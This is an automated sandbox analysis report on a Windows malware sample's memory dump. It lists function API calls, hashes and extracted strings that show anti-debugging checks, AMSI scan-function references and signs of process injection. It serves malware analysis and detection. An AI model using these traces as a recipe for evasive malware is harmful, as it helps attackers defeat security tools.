Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: HandleModule$AddressProc$SectionUnmapView
String ID: noitceSfOweiVpamnUtN$ntdll
API String ID: 3503870465-2520021413
Opcode ID: 56490795006d98b2884aebe8ba06c99e37f06a681845fd66faaf6ff1c467a9f9
Instruction ID: e6ead4f2378407c8cb71326b42e06f2335d226887235433d96f0f79a1a45e975
Opcode Fuzzy Hash: 56490795006d98b2884aebe8ba06c99e37f06a681845fd66faaf6ff1c467a9f9
Instruction Fuzzy Hash: 3E0186B4640308AFEB01EFB4EC55F5EB7FEEB4A700F928460B400D7600EA70AD049E25

Function 0279DEA4 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON

Download Yara Rule

APIs

Rt.N(?,?,00000000,0279DF72), ref: 0279DF20
RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0279DF72), ref: 0279DF36
NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0279DF72), ref: 0279DF55

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: Path$DeleteFileNameName_
String ID:
API String ID: 4284456518-0
Opcode ID: 6440b44dd99d8e78eeca8385068fe26226e5bb619c2537828de7a569522c33c4
Instruction ID: 5f91467215c186325fefa188f56e9c5338cf42576e47e7bd3c71db2c44bf2b6b
Opcode Fuzzy Hash: 6440b44dd99d8e78eeca8385068fe26226e5bb619c2537828de7a569522c33c4
Instruction Fuzzy Hash: 06016275A443086EEF16FBA0AE96BCD77BEAB55700F5040D2D210F6181EA74AF088B61

Function 0279DEF8 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02784F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02784F2E

Rt.N(?,?,00000000,0279DF72), ref: 0279DF20
RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0279DF72), ref: 0279DF36
NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0279DF72), ref: 0279DF55

Part of subcall function 02784C60: SysFreeString.OLEAUT32(0279F798), ref: 02784C6E

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: PathString$AllocDeleteFileFreeNameName_
String ID:
API String ID: 1530111750-0
Opcode ID: a5b1676e7e89ca1b28b87453a02c35a7fcd087cd34c58fcf5740dd3932ba6c9a
Instruction ID: afef6f37879c120b80d9771f112f7a2903321aa26fbaf0d1c46a3ecad5c6903e
Opcode Fuzzy Hash: a5b1676e7e89ca1b28b87453a02c35a7fcd087cd34c58fcf5740dd3932ba6c9a
Instruction Fuzzy Hash: F401E17594430CBADB12FBA0DD56FCEB7ADDB49700F5044A1E600E2180EA74AF048A64

Function 02796DC8 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON

Download Yara Rule

APIs

Part of subcall function 02796D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02796DB9,?,?,?,00000000), ref: 02796D99

CoCreateInstance.OLE32(?,00000000,00000005,02796EAC,00000000,00000000,02796E2B,?,00000000,02796E9B), ref: 02796E17

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: CreateFromInstanceProg
String ID:
API String ID: 2151042543-0
Opcode ID: bb03eb84f92fa453a35ae28df750ebac50a099e86325c3ffd5ddfbd92e16e8cf
Instruction ID: e2580da93f9cfee8418963d1fb9bffa1a5fd296e56af81b21bcab6242163ab73
Opcode Fuzzy Hash: bb03eb84f92fa453a35ae28df750ebac50a099e86325c3ffd5ddfbd92e16e8cf
Instruction Fuzzy Hash: 36012671208704AEFF16EF66EC2696FBFBDE749B10F520939F405E2680E6319900C870

Function 0279FABC Relevance: 220.8, APIs: 8, Strings: 113, Instructions: 9098COMMON

Download Yara Rule

APIs

InetIsOffline.URL(00000000,00000000,027AB99E,?,?,?,00000305,00000000,00000000), ref: 0279FAF6

Part of subcall function 0279889C: LoadLibraryA.KERNEL32(00000000,00000000,02798983), ref: 027988D0
Part of subcall function 0279889C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02798983), ref: 027988E0
Part of subcall function 0279889C: GetProcAddress.KERNEL32(74AD0000,00000000), ref: 027988F9
Part of subcall function 0279889C: FreeLibrary.KERNEL32(74AD0000,00000000,027DB388,Function_0000662C,00000004,027DB398,027DB388,000186A3,00000040,027DB39C,74AD0000,00000000,00000000,00000000,00000000,02798983), ref: 02798963

Part of subcall function 0279F9DC: GetModuleHandleW.KERNEL32(KernelBase,?,0279FDE0,UacInitialize,027DB37C,027AB9D4,UacScan,027DB37C,027AB9D4,ScanBuffer,027DB37C,027AB9D4,OpenSession,027DB37C,027AB9D4,ScanString), ref: 0279F9E2
Part of subcall function 0279F9DC: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0279F9F4

Part of subcall function 0279FA38: GetModuleHandleW.KERNEL32(KernelBase), ref: 0279FA48
Part of subcall function 0279FA38: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0279FA5A
Part of subcall function 0279FA38: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0279FA71

Part of subcall function 02787E5C: GetFileAttributesA.KERNEL32(00000000,?,027A0714,ScanString,027DB37C,027AB9D4,OpenSession,027DB37C,027AB9D4,ScanString,027DB37C,027AB9D4,UacScan,027DB37C,027AB9D4,UacInitialize), ref: 02787E67

Part of subcall function 0278C364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,028CF8C4,?,027A0A46,ScanBuffer,027DB37C,027AB9D4,OpenSession,027DB37C,027AB9D4,ScanBuffer,027DB37C,027AB9D4,OpenSession), ref: 0278C37B

Part of subcall function 0279E064: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0279E134), ref: 0279E09F
Part of subcall function 0279E064: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0279E134), ref: 0279E0CF
Part of subcall function 0279E064: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0279E0E4
Part of subcall function 0279E064: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0279E110
Part of subcall function 0279E064: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0279E119

Part of subcall function 02787E80: GetFileAttributesA.KERNEL32(00000000,?,027A3891,ScanString,027DB37C,027AB9D4,OpenSession,027DB37C,027AB9D4,ScanBuffer,027DB37C,027AB9D4,OpenSession,027DB37C,027AB9D4,Initialize), ref: 02787E8B

Part of subcall function 02788048: CreateDirectoryA.KERNEL32(00000000,00000000,?,027A3A2F,OpenSession,027DB37C,027AB9D4,ScanString,027DB37C,027AB9D4,Initialize,027DB37C,027AB9D4,ScanString,027DB37C,027AB9D4), ref: 02788055

Strings

C:\Windows\System32\, xrefs: 027A06FF, 027A7B3B, 027A8883
SLIsGenuineLocalEx, xrefs: 027AA080
ieproxy, xrefs: 0279FE09, 0279FE30, 0279FE60
GET, xrefs: 027A274A
tquery, xrefs: 027AA271
mssip32, xrefs: 027A00A0, 027A00D3, 027A0106, 027AA33D
SLLoadApplicationPolicies, xrefs: 027AA0B3
DllRegisterServer, xrefs: 0279FE49, 027A0395
psapi, xrefs: 027AAB9E
URL=file:", xrefs: 027A6F27
WinHttp.WinHttpRequest.5.1, xrefs: 027A2631
NtGetWriteWatch, xrefs: 027AB029
acS, xrefs: 027A4024
TrustOpenStores, xrefs: 0279FEF8
RtlQueryProcessDebugInformation, xrefs: 027AAB4E
BCryptQueryProviderRegistration, xrefs: 027A01D1
.url, xrefs: 027A5F5B
NtWaitForSingleObject, xrefs: 027AA822
HotKey=, xrefs: 027A70B1
NtOpenSection, xrefs: 027AB0C2
NtQueryInformationThread, xrefs: 027AB08F
dbgcore, xrefs: 027A9423, 027A9437
DllGetClassObject, xrefs: 0279FDF8, 027A032F, 027AA2C0, 027AAF90
Ntdll, xrefs: 027AAB26, 027AAB35, 027AAB44, 027AAB53
UacScan, xrefs: 0279FD1F, 027A03CE, 027A04C6, 027A0A95, 027A167B, 027A1C59, 027A25BB, 027A2CCE, 027A3F50, 027A5D57, 027A62C7, 027A648C, 027A67BA, 027A68C7, 027A6B25, 027A6C1D, 027A77C0, 027A7B62, 027A7D79, 027A7F0C, 027A8160, 027A85EC, 027A8775, 027A88CE, 027A8A74, 027A8C01, 027A8D95, 027A8F14, 027A918B, 027A95F9, 027A9813, 027A99F4, 027A9B68, 027A9D9E, 027AAC0E
CryptSIPGetInfo, xrefs: 027A0089
C:\\Users\\Public\\Libraries\\, xrefs: 027A6337
BCryptVerifySignature, xrefs: 027A019E, 027AA451
VirtualAlloc, xrefs: 027AAC84
NtQuerySecurityObject, xrefs: 027AB18E
FlushInstructionCache, xrefs: 027AAD83
can, xrefs: 027A4037
bcrypt, xrefs: 027A01B5, 027A01E8, 027A021B, 027AA468
SxTracerGetThreadContextDebug, xrefs: 027AA28D, 027AAF5D
http, xrefs: 027A241D
LdrLoadDll, xrefs: 027AB1F4
DlpGetWebSiteAccess, xrefs: 027AA691
EnumProcessModules, xrefs: 027AAB99
CryptSIPGetSignedDataMsg, xrefs: 027A00EF
NtMapViewOfSection, xrefs: 027AB128
CreateProcessAsUserW, xrefs: 027AABD5, 027AABF3
OpenProcess, xrefs: 027AAD1D
WintrustAddActionID, xrefs: 0279FF2B
EtwEventWriteEx, xrefs: 027AB2C0
NtWriteVirtualMemory, xrefs: 027AB25A
CreateProcessAsUserA, xrefs: 027AABC6
GZmMS1j, xrefs: 0279FB04
ScanBuffer, xrefs: 0279FCBB, 027A0013, 027A023D, 027A07A4, 027A08B1, 027A09C9, 027A0D9D, 027A0F3B, 027A10E1, 027A1201, 027A1396, 027A148E, 027A16F7, 027A189D, 027A1A39, 027A1B4F, 027A1BDD, 027A1EF1, 027A2192, 027A22A3, 027A2440, 027A27EB, 027A28F7, 027A2B15, 027A2C32, 027A2F4D, 027A2FEE, 027A3162, 027A3322, 027A3644, 027A3A3B, 027A3CDA, 027A3DDC, 027A5878, 027A5BB2, 027A5ECB, 027A624B, 027A6584, 027A6836, 027A6A3B, 027A6BA1, 027A6D15, 027A6D91, 027A7934, 027A79C5, 027A7DF5, 027A7F88, 027A80E4, 027A81DC, 027A86F9, 027A89C6, 027A8B6C, 027A8CF9, 027A8E8D, 027A900C, 027A9283, 027A937B, 027A9797, 027A9A70, 027A9BE4, 027A9E1A, 027A9EAC, 027AA1E4, 027AA582, 027AAAB1, 027AB3B7
MiniDumpWriteDump, xrefs: 027A941E
NtReadVirtualMemory, xrefs: 027AB15B
CreateProcessWithLogonW, xrefs: 027AABE4
NtQueryDirectoryFile, xrefs: 027AAB3F
UacInitialize, xrefs: 0279FD83, 027A044A, 027A0B8D, 027A5704, 027A5ABA, 027A5FA7, 027A7ABD, 027A92FF, 027A971B
LdrGetProcedureAddress, xrefs: 027AB227
WriteVirtualMemory, xrefs: 027AAD50
DlpCheckIsCloudSyncApp, xrefs: 027AA62B
SLGetGenuineInformation, xrefs: 027AA01A
[InternetShortcut], xrefs: 027A6F18
RetailTracerEnable, xrefs: 027AA25A
Kernel32, xrefs: 027AABAD, 027AABBC, 027AABF8
GetProcessMemoryInfo, xrefs: 027AA2F3
sppc, xrefs: 027AA031, 027AA064, 027AA097, 027AA0CA, 027AAFDA, 027AB00D
RtlAllocateHeap, xrefs: 027AA7EF, 027AA855
OpenSession, xrefs: 0279FB8F, 0279FC57, 027A0607, 027A0728, 027A0835, 027A094D, 027A0D21, 027A0EBF, 027A1065, 027A1185, 027A131A, 027A1412, 027A15FF, 027A17A5, 027A1AD3, 027A1D01, 027A1E75, 027A1F98, 027A2116, 027A24BC, 027A253F, 027A2657, 027A276F, 027A287B, 027A2A99, 027A2BB6, 027A2E55, 027A2ED1, 027A30E6, 027A3286, 027A35C8, 027A3783, 027A399D, 027A3AB7, 027A3E58, 027A57FC, 027A5996, 027A5B36, 027A5CDB, 027A5E4F, 027A609F, 027A6153, 027A6410, 027A6508, 027A69BF, 027A6C99, 027A6E0D, 027A6FA3, 027A7153, 027A783C, 027A7A41, 027A7C5A, 027A7CFD, 027A7E90, 027A8258, 027A84F4, 027A87F1, 027A894A, 027A8AF0, 027A8C7D, 027A8E11, 027A8F90, 027A9093, 027A9207, 027A9485, 027A9675, 027A9966, 027A9AEC, 027A9D22, 027A9F28, 027AA0EC, 027AA3DB, 027AA48A, 027AA6CA, 027AA8C1, 027AA9B9, 027AAE6B, 027AB433
NtAccessCheck, xrefs: 027AB1C1
advapi32, xrefs: 027A940F
DlpGetArchiveFileTraceInfo, xrefs: 027AA65E
Advapi, xrefs: 027AAB62, 027AAB71, 027AAB80, 027AAB8F, 027AABCB, 027AABDA, 027AABE9
CreateProcessW, xrefs: 027AABB7
psapi, xrefs: 027AA30A
VirtualProtect, xrefs: 027AACEA
ntdll, xrefs: 027A93FB, 027A944B, 027A945F, 027AA7D3, 027AA806, 027AA839, 027AA86C, 027AA89F, 027AB040, 027AB073, 027AB0A6, 027AB0D9, 027AB10C, 027AB13F, 027AB172, 027AB1A5, 027AB1D8, 027AB20B, 027AB23E, 027AB271, 027AB2A4, 027AB2D7, 027AB30A
IconIndex=, xrefs: 027A6F7D
smartscreenps, xrefs: 027A0346, 027A0379, 027A03AC
EnumServicesStatusW, xrefs: 027AAB6C
NtQueryVirtualMemory, xrefs: 027AB05C
kernel32, xrefs: 027AAC9B, 027AACCE, 027AAD01, 027AAD34, 027AAD67, 027AAD9A, 027AADCD
DllGetActivationFactory, xrefs: 027A0362
Initialize, xrefs: 0279FB2B, 027A0B11, 027A0CA5, 027A0E43, 027A0FE9, 027A129E, 027A1941, 027A1D7D, 027A2227, 027A2331, 027A2A18, 027A2D4A, 027A306A, 027A339E, 027A354C, 027A38A5, 027A3C5E, 027A5A3E, 027A5DD3, 027A61CF, 027A6394, 027A6600, 027A673E, 027A6943, 027A78B8, 027A8570, 027A957D, 027AA168, 027AA506, 027AAA35, 027AADEF, 027AB33B
NtCreateSection, xrefs: 027AB0F5
UacUninitialize, xrefs: 027A3B66, 027A3ED4
EnumServicesStatusExW, xrefs: 027AAB8A
SLGetEncryptedPIDEx, xrefs: 027AAFF6
EtwEventWrite, xrefs: 027AB2F3
SLGetSLIDList, xrefs: 027AA04D
D2^Tyj}~TVrgoij[Dkcxn}dmu, xrefs: 027A0C7F
CryptSIPVerifyIndirectData, xrefs: 027A00BC, 027AA326
SetUnhandledExceptionFilter, xrefs: 027AADB6
NtOpenProcess, xrefs: 027A945A
sppwmi, xrefs: 027AAFA7
RtlCreateQueryDebugBuffer, xrefs: 027AA888
EnumServicesStatusExA, xrefs: 027AAB7B
NtAlertResumeThread, xrefs: 027AA7BC
GetProxyDllInfo, xrefs: 0279FE1F
endpointdlp, xrefs: 027AA60F, 027AA642, 027AA675, 027AA6A8
C:\Users\Public\, xrefs: 027A5F50, 027A71C3
NtOpenObjectAuditAlarm, xrefs: 027A93F6
VirtualAllocEx, xrefs: 027AACB7
spp, xrefs: 027AA2A4, 027AA2D7, 027AAF74
ScanString, xrefs: 0279FBF3, 0279FE82, 0279FF97, 027A0128, 027A02B9, 027A0542, 027A0683, 027A0C09, 027A1821, 027A19BD, 027A1DF9, 027A2014, 027A2090, 027A23AD, 027A26D3, 027A299C, 027A2DD9, 027A320A, 027A341A, 027A34D0, 027A37FF, 027A3921, 027A3BE2, 027A5780, 027A591A, 027A5C5F, 027A6023, 027A66C2, 027A6EA8, 027A701F, 027A70D7, 027A7744, 027A7BDE, 027A8045, 027A8668, 027A910F, 027A9501, 027A98EA, 027A9CA6, 027A9FA4, 027AA35F, 027AA746, 027AA93D, 027AAEE7
I_QueryTagInformation, xrefs: 027A940A
SLGatherMigrationBlob, xrefs: 027AAFC3
FindCertsByIssuer, xrefs: 0279FF5E
MiniDumpReadDumpStream, xrefs: 027A9432
NtSetSecurityObject, xrefs: 027A9446
EnumServicesStatusA, xrefs: 027AAB5D
wintrust, xrefs: 0279FF0F, 0279FF42, 0279FF75
DlpNotifyPreDragDrop, xrefs: 027AA5F8
NtDeviceIoControlFile, xrefs: 027AAB30
CreateProcessA, xrefs: 027AABA8
NtOpenFile, xrefs: 027AB28D
NtQuerySystemInformation, xrefs: 027AAB21
BCryptRegisterProvider, xrefs: 027A0204

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: File$Module$AddressHandleProc$AttributesLibraryNamePath$CheckCloseCreateDebuggerDirectoryFreeInetInformationLoadName_OfflineOpenPresentQueryReadRemote
String ID: .url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
API String ID: 2044571854-184510087
Opcode ID: 0475b29a03ab9fce9cc69fb19d6c833f04f224cf959631db83a9554138f8812e
Instruction ID: aed1b8af7a9227ee14dcc7c7d6b9fef5d77abd8be871a989e5ae1c726434445d
Opcode Fuzzy Hash: 0475b29a03ab9fce9cc69fb19d6c833f04f224cf959631db83a9554138f8812e
Instruction Fuzzy Hash: 97142D35B9115E8BDF12FB64DCA8ADE73B6FF98300F5041E69009AB210DA71AE91CF51

Function 027A82F8 Relevance: 160.3, APIs: 5, Strings: 85, Instructions: 2771
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0279889C: LoadLibraryA.KERNEL32(00000000,00000000,02798983), ref: 027988D0
Part of subcall function 0279889C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02798983), ref: 027988E0
Part of subcall function 0279889C: GetProcAddress.KERNEL32(74AD0000,00000000), ref: 027988F9
Part of subcall function 0279889C: FreeLibrary.KERNEL32(74AD0000,00000000,027DB388,Function_0000662C,00000004,027DB398,027DB388,000186A3,00000040,027DB39C,74AD0000,00000000,00000000,00000000,00000000,02798983), ref: 02798963

CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,028CF7DC,028CF820,OpenSession,027DB37C,027AB9D4,UacScan,027DB37C), ref: 027A88B9
ResumeThread.KERNEL32(00000000,ScanBuffer,027DB37C,027AB9D4,OpenSession,027DB37C,027AB9D4,UacScan,027DB37C,027AB9D4,ScanBuffer,027DB37C,027AB9D4,OpenSession,027DB37C,027AB9D4), ref: 027A8F03
CloseHandle.KERNEL32(00000000,ScanBuffer,027DB37C,027AB9D4,OpenSession,027DB37C,027AB9D4,UacScan,027DB37C,027AB9D4,00000000,ScanBuffer,027DB37C,027AB9D4,OpenSession,027DB37C), ref: 027A9082

Part of subcall function 02798818: LoadLibraryW.KERNEL32(bcrypt,?,000005A0,00000000,027DB3A4,0279A43F,ScanString,027DB3A4,0279A7F4,ScanBuffer,027DB3A4,0279A7F4,Initialize,027DB3A4,0279A7F4,UacScan), ref: 0279882C
Part of subcall function 02798818: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02798846
Part of subcall function 02798818: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000005A0,00000000,027DB3A4,0279A43F,ScanString,027DB3A4,0279A7F4,ScanBuffer,027DB3A4,0279A7F4,Initialize), ref: 02798882

CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,027DB37C,027AB9D4,UacInitialize,027DB37C,027AB9D4,ScanBuffer,027DB37C,027AB9D4,OpenSession,027DB37C,027AB9D4,UacScan,027DB37C), ref: 027A9474

Part of subcall function 02787E5C: GetFileAttributesA.KERNEL32(00000000,?,027A0714,ScanString,027DB37C,027AB9D4,OpenSession,027DB37C,027AB9D4,ScanString,027DB37C,027AB9D4,UacScan,027DB37C,027AB9D4,UacInitialize), ref: 02787E67

Part of subcall function 0279DF80: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0279E052), ref: 0279DFBF
Part of subcall function 0279DF80: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0279DFF9
Part of subcall function 0279DF80: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0279E026
Part of subcall function 0279DF80: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0279E02F

Part of subcall function 02798204: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0279828E), ref: 02798270

ExitProcess.KERNEL32(00000000,OpenSession,027DB37C,027AB9D4,ScanBuffer,027DB37C,027AB9D4,Initialize,027DB37C,027AB9D4,00000000,00000000,00000000,ScanString,027DB37C,027AB9D4), ref: 027AB4A5

Strings

C:\Windows\System32\, xrefs: 027A8883
DlpCheckIsCloudSyncApp, xrefs: 027AA62B
SLGetGenuineInformation, xrefs: 027AA01A
SLIsGenuineLocalEx, xrefs: 027AA080
tquery, xrefs: 027AA271
RetailTracerEnable, xrefs: 027AA25A
mssip32, xrefs: 027AA33D
Kernel32, xrefs: 027AABAD, 027AABBC, 027AABF8
GetProcessMemoryInfo, xrefs: 027AA2F3
sppc, xrefs: 027AA031, 027AA064, 027AA097, 027AA0CA, 027AAFDA, 027AB00D
SLLoadApplicationPolicies, xrefs: 027AA0B3
RtlAllocateHeap, xrefs: 027AA7EF, 027AA855
psapi, xrefs: 027AAB9E
OpenSession, xrefs: 027A8304, 027A8478, 027A84F4, 027A87F1, 027A894A, 027A8AF0, 027A8C7D, 027A8E11, 027A8F90, 027A9093, 027A9207, 027A9485, 027A9675, 027A9966, 027A9AEC, 027A9D22, 027A9F28, 027AA0EC, 027AA3DB, 027AA48A, 027AA6CA, 027AA8C1, 027AA9B9, 027AAE6B, 027AB433
advapi32, xrefs: 027A940F
NtAccessCheck, xrefs: 027AB1C1
DlpGetArchiveFileTraceInfo, xrefs: 027AA65E
NtGetWriteWatch, xrefs: 027AB029
Advapi, xrefs: 027AAB62, 027AAB71, 027AAB80, 027AAB8F, 027AABCB, 027AABDA, 027AABE9
CreateProcessW, xrefs: 027AABB7
psapi, xrefs: 027AA30A
VirtualProtect, xrefs: 027AACEA
ntdll, xrefs: 027A93FB, 027A944B, 027A945F, 027AA7D3, 027AA806, 027AA839, 027AA86C, 027AA89F, 027AB040, 027AB073, 027AB0A6, 027AB0D9, 027AB10C, 027AB13F, 027AB172, 027AB1A5, 027AB1D8, 027AB20B, 027AB23E, 027AB271, 027AB2A4, 027AB2D7, 027AB30A
RtlQueryProcessDebugInformation, xrefs: 027AAB4E
NtWaitForSingleObject, xrefs: 027AA822
NtOpenSection, xrefs: 027AB0C2
NtQueryInformationThread, xrefs: 027AB08F
EnumServicesStatusW, xrefs: 027AAB6C
NtQueryVirtualMemory, xrefs: 027AB05C
kernel32, xrefs: 027AAC9B, 027AACCE, 027AAD01, 027AAD34, 027AAD67, 027AAD9A, 027AADCD
Initialize, xrefs: 027A8380, 027A8570, 027A957D, 027AA168, 027AA506, 027AAA35, 027AADEF, 027AB33B
dbgcore, xrefs: 027A9423, 027A9437
NtCreateSection, xrefs: 027AB0F5
DllGetClassObject, xrefs: 027AA2C0, 027AAF90
EnumServicesStatusExW, xrefs: 027AAB8A
SLGetEncryptedPIDEx, xrefs: 027AAFF6
SLGetSLIDList, xrefs: 027AA04D
EtwEventWrite, xrefs: 027AB2F3
UacScan, xrefs: 027A85EC, 027A8775, 027A88CE, 027A8A74, 027A8C01, 027A8D95, 027A8F14, 027A918B, 027A95F9, 027A9813, 027A99F4, 027A9B68, 027A9D9E, 027AAC0E
Ntdll, xrefs: 027AAB26, 027AAB35, 027AAB44, 027AAB53
CryptSIPVerifyIndirectData, xrefs: 027AA326
BCryptVerifySignature, xrefs: 027AA451
VirtualAlloc, xrefs: 027AAC84
SetUnhandledExceptionFilter, xrefs: 027AADB6
NtQuerySecurityObject, xrefs: 027AB18E
FlushInstructionCache, xrefs: 027AAD83
NtOpenProcess, xrefs: 027A945A
bcrypt, xrefs: 027AA468
sppwmi, xrefs: 027AAFA7
RtlCreateQueryDebugBuffer, xrefs: 027AA888
SxTracerGetThreadContextDebug, xrefs: 027AA28D, 027AAF5D
EnumServicesStatusExA, xrefs: 027AAB7B
NtAlertResumeThread, xrefs: 027AA7BC
LdrLoadDll, xrefs: 027AB1F4
